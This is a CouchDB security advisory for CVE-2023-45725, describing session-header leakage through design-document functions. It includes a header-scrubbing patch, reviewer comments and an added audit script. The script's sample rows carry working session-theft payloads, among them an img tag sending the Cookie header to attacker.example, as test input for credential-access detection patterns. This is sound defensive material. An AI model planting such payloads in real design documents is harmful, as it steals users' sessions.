.. Licensed under the Apache License, Version 2.0 (the "License"); you may not
.. use this file except in compliance with the License. You may obtain a copy of
.. the License at
..
..   http://www.apache.org/licenses/LICENSE-2.0
..
.. Unless required by applicable law or agreed to in writing, software
.. distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
.. WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
.. License for the specific language governing permissions and limitations under
.. the License.

.. _cve/2023-45725:

===========================================================================
CVE-2023-45725: Apache CouchDB: Privilege Escalation Using Design Documents
===========================================================================

:Date: 12.12.2023

:Affected: 3.3.2 and below

:Severity: Medium

:Vendor: The Apache Software Foundation

Description
===========

Design document functions that receive the user's HTTP request object may
expose the ``Authorization`` or session ``Cookie`` headers of the user who
accesses the document. These design document functions are:

* list
* show
* rewrite
* update

An attacker can leak the session component by rendering it into HTML-like
output, by embedding it in the URL of an external resource (such as an image)
that the victim's browser then fetches, or by storing the credential in a
``_local`` document from an ``update`` function. A stolen session lets the
attacker act with that user's privileges. For the attack to succeed, the
attacker must be able to insert the design document into the database and then
get a user to invoke one of these functions from that design document.

Mitigation
==========

CouchDB :ref:`3.3.3 ` scrubs the sensitive headers from HTTP request objects
before they are passed to the query server execution environment.

For versions older than :ref:`3.3.3 `, this patch applied to the ``loop.js``
file would also mitigate the issue:

.. code-block:: diff

    diff --git a/share/server/loop.js b/share/server/loop.js
    --- a/share/server/loop.js
    +++ b/share/server/loop.js
    @@ -49,6 +49,20 @@ function create_nouveau_sandbox() {
       return sandbox;
     }
     
    +function scrubReq(args) {
    +  var req = args.pop()
    +  if (req.method && req.headers && req.peer && req.userCtx) {
    +    delete req.cookie
    +    for (var p in req.headers) {
    +      if (req.headers.hasOwnProperty(p) && ["authorization", "cookie"].indexOf(p.toLowerCase()) !== -1) {
    +        delete req.headers[p]
    +      }
    +    }
    +  }
    +  args.push(req)
    +  return args
    +}
    +
     // Commands are in the form of json arrays:
     // ["commandname",..optional args...]\n
     //
    @@ -85,7 +99,7 @@ var DDoc = (function() {
           var funPath = args.shift();
           var cmd = funPath[0];
           // the first member of the fun path determines the type of operation
    -      var funArgs = args.shift();
    +      var funArgs = scrubReq(args.shift());
           if (ddoc_dispatch[cmd]) {
             // get the function, call the command with it
             var point = ddoc;

Workarounds
===========

Avoid using design documents from untrusted sources, which may attempt to
access or manipulate the request object's headers.

Credit
======

This issue was found by Natan Nehorai and reported by Or Peles from the JFrog
Vulnerability Research Team. It was also independently found by Richard Ellis
and Mike Rhodes from IBM/Cloudant.
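Review bot: in the first hunk, ``scrubReq`` dereferences ``req`` without checking that it exists: ``var req = args.pop()`` followed by ``if (req.method && req.headers && req.peer && req.userCtx)`` throws a TypeError when ``args`` is empty, turning an argument-less ddoc command into a query server error instead of a no-op; guard with ``if (req && req.method && ...)``. Two limits of the same hunk deserve a comment: the four-field shape test is a heuristic, so an object missing any one of those fields passes through unscrubbed, and the list ``["authorization", "cookie"]`` names only those two headers, so any other credential-bearing header a deployment forwards to CouchDB still reaches the design-document function.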
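Review bot: the second hunk applies the scrub to every ddoc command's argument list, not only to list/show/rewrite/update, and nothing at the call site says so; add a comment on ``var funArgs = scrubReq(args.shift());`` stating that the request object, when present, is always the last argument (which is why ``scrubReq`` pops and re-pushes it) and that commands whose last argument does not look like a request are left untouched by the shape check. Note also that ``scrubReq`` mutates the array it is given and returns the same array, so assigning its result to ``funArgs`` is redundant with the in-place change; either is fine, but the comment should say which behaviour callers may rely on.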
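A check to go with the Workarounds section, as an added example in JavaScript that is not part of CouchDB: it scans design documents for ``show``, ``list``, ``update`` and ``rewrite`` functions that read the request object's ``headers`` or ``cookie``, name the ``Authorization`` or ``Cookie`` header literally, or write ``_local`` documents, which are the channels the advisory describes. The rows are constructed to mimic ``_all_docs`` output with ``include_docs=true`` over the ``_design/`` key range; the design-document names and the hostname ``attacker.example`` are placeholders. The request parameter name is read from each function's signature rather than assumed to be ``req``, since an attacker can call it anything.

```javascript
// Added example, not CouchDB project code. Audits design documents for the
// request-object accesses that CVE-2023-45725 turns into a session leak.
'use strict';

// Name of the request parameter: rewrites take (req); show/update take
// (doc, req); list takes (head, req). Returns null when no signature is found.
function requestParamName(src, kind) {
  const m = /function\s*\w*\s*\(([^)]*)\)/.exec(src);
  if (!m) return null;
  const params = m[1].split(',').map(s => s.trim()).filter(Boolean);
  return (kind === 'rewrites' ? params[0] : params[1]) || null;
}

// Findings for one function source string.
function findingsForFunction(src, kind) {
  const hits = [];
  const p = requestParamName(src, kind);
  if (p) {
    // <param>.headers, <param>.cookie, <param>['headers'], <param>["cookie"]
    const re = new RegExp('\\b' + p + '\\s*(\\.\\s*(headers|cookie)\\b|\\[\\s*[\'"](headers|cookie)[\'"]\\s*\\])');
    if (re.test(src)) hits.push(p + '.headers or ' + p + '.cookie is read');
  }
  if (/['"](authorization|cookie)['"]/i.test(src)) hits.push('names the Authorization or Cookie header');
  if (/_local\//.test(src)) hits.push('writes a _local document');
  return hits;
}

// Findings for one design document. rewrites may be an array of rules
// (declarative, no code) or a function source string; only the latter is code.
function auditDesignDoc(ddoc) {
  const findings = [];
  for (const kind of ['shows', 'lists', 'updates']) {
    for (const [name, src] of Object.entries(ddoc[kind] || {})) {
      const hits = findingsForFunction(String(src), kind);
      if (hits.length) findings.push({ ddoc: ddoc._id, fn: kind + '/' + name, hits });
    }
  }
  if (typeof ddoc.rewrites === 'string') {
    const hits = findingsForFunction(ddoc.rewrites, 'rewrites');
    if (hits.length) findings.push({ ddoc: ddoc._id, fn: 'rewrites', hits });
  }
  return findings;
}

// rows as returned by
// GET /db/_all_docs?startkey="_design/"&endkey="_design0"&include_docs=true
function auditRows(rows) {
  return rows.flatMap(row => auditDesignDoc(row.doc));
}

// Constructed sample: one harmless design doc and one carrying the three
// exfiltration channels from the advisory. attacker.example is a placeholder.
const SAMPLE_ROWS = [
  { id: '_design/safe', doc: { _id: '_design/safe',
      shows: { html: "function(doc, req) { return {headers: {'Content-Type': 'text/html'}, body: '<p>' + doc.title + '</p>'}; }" } } },
  { id: '_design/evil', doc: { _id: '_design/evil',
      shows: { leak: "function(doc, req) { return '<img src=\"https://attacker.example/c?' + req.headers.Cookie + '\">'; }" },
      updates: { stash: "function(doc, request) { var d = {_id: '_local/stash', c: request.headers['Cookie']}; return [d, 'ok']; }" },
      rewrites: "function(req) { return {path: '../../_show/leak?c=' + req.cookie.AuthSession}; }" } }
];

for (const finding of auditRows(SAMPLE_ROWS)) {
  console.log(finding.ddoc, finding.fn, '->', finding.hits.join('; '));
}
```

This is a source-level heuristic, not a sandbox: a function can reach the header through ``JSON.stringify(req)`` or an aliased variable without matching any pattern, so a clean scan does not make an untrusted design document safe on an unpatched node. It does give a fast triage list of which design documents to read by hand before upgrading.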